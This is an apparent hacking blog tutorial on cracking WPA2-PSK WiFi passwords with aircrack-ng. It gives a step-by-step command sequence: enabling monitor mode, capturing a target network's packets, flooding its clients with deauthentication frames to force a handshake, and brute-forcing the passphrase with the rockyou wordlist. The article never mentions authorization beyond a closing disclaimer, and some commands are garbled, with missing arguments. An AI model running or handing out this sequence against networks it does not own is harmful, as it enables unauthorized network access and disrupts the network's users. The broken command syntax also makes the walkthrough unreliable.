WiFi is getting so much essential as days are passing but WPA2-PSK may not be as safe as you think. There are a few attacks against WAP2-PSK. One of the most common attacks is against WPA2 is exploiting a weak passphrase and that’s sometimes also called. So Let’s see How to Hack WPA2-PSK WiFi Password Using Linux.
Cracking WPA2 wifi password is not really an easy task to do, you can’t crack it with a mouseclick as they show in movies and there is no software that will give you the password without some hard work but you don’t worrycan show you how to crack it with few easy steps and we will do it using aircrack-ng.
When Wi-Fi was first developed in the late 1990s,was created to give wireless communications confidentiality. WEP, as it became known, proved terribly flawed and easily cracked. As a replacement, most wireless access points now use Wi-Fi Protected Access II with a pre-shared key for wireless security, known as WPA2-PSK. WPA2 uses a stronger encryption algorithm, AES, that’s very difficult to crack—but not impossible.
The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.
Requirements: To Hack WPA2-PSK WiFi Password Using Linux
- Kali Linux or any Pentesting Linux Distros with aircrack-ng installed in it. if you don’t have aircrack-ng suite get it by this command in terminal sudo apt-get install aircrack-ng
- A Wireless Network Adapter that support monitor mode like Alfa 2W AWUS036NH, Alfa AWUS036H, wifiy-city 56G, or you can check this page here for card compatibility by clicking on >> .
- A wordlist comprising of all the possible different combination of pass-phrases.
Let’s See How To Hack WPA2-PSK WiFi Password Using Linux
1) open up your Root Terminal as root and type ifconfig this will show you all the networking interfaces connected to your device.
if your wireless network adapter is working fine you should see the “wlan0” the name may change if you have more than one connected wireless adapter.
2) Now to start monitor mode type airmon-ng start wlan0.
airmon-ng is a traffic monitoring tool.
wlan0 is your Wireless Interface.
After this command, It’ll start the monitor mode.
As it’s seen the monitor mode is working under “wlan0mon“, So this is your card name for now.
We can see there is a list of Process ID’s (PID) and that will cause trouble during the process so we’ll kill those processes by typing “kill <pid>” in my case, it is “kill 1210 1341 1591 1592“.
3) To show the list of available WiFi Network Type airodump-ng wlan0mon.
airodump-ng is a WiFi Packet Capturing Tool.
wlan0mon is my Monitoring Interface.
airodump-ng will start capturing all packets.
From the captured packets select your target and note its ‘BSSID‘ (BSSID = Base Service Set Identifier) and ‘Channel‘. Then stop the capture using “ctrl+c“.
4) Start capturing the packets of your target network by typing airodump-ng -c -w –bssid wlan0mon and in my case, it is airodump-ng -c 1 -w HACKAGONwpa2 –bssid 74:DA:38:24:CF:34 wlan0mon.
This will start capturing the packets and if you get the handshake then you won’t need the aireplay-ng command but in case if you don’t get the handshake while capturing of packets goes on, open a new terminal as root and type aireplay-ng -0 0 -a mon0.
aireplay-ng => Tool for Deauthentication, Fake Authentication, and Other Packet Injections.
-0 => Number Associated for Deauthentication.
0 => Deauth Count.
-a => bssid here we are trying to send a deauthentication request.
In my case, the command looks like aireplay-ng -0 0 -a 74:DA:38:24:CF:34 wlan0mon.
After few seconds stop it using ‘Ctrl+c‘.
Now after we have successfully captured the WPA handshake it’ll look like:
5) Stop the capture using ‘Ctrl+c‘ and type ‘ls‘ that would bring up all the current directories and files.
Now, Select the file with ‘.cap‘ extension and type aircrack-ng -w
‘aircrack-ng‘ => Tool that helps in cracking the password.
In my case, the command looks like aircrack-ng -w /usr/share/wordlists/rockyou.txt ‘/root/HACKAGONwpa2-01.cap’.
Now it starts finding suitable passphrase.
And now all you have to do is to wait till you see the lovely news (KEY Found).
Summing Up All Step in few lines:
- airmon-ng start wlan0
- airodump-ng wlan0mon
- airodump-ng -c 1 -w HACKAGONwpa2 –bssid 74:DA:38:24:CF:34 wlan0mon
- aireplay-ng -0 0 -a 74:DA:38:24:CF:34 wlan0mon
- aircrack-ng -w /usr/share/wordlists/rockyou.txt ‘/root/HACKAGONwpa2-01.cap’
Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.
Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.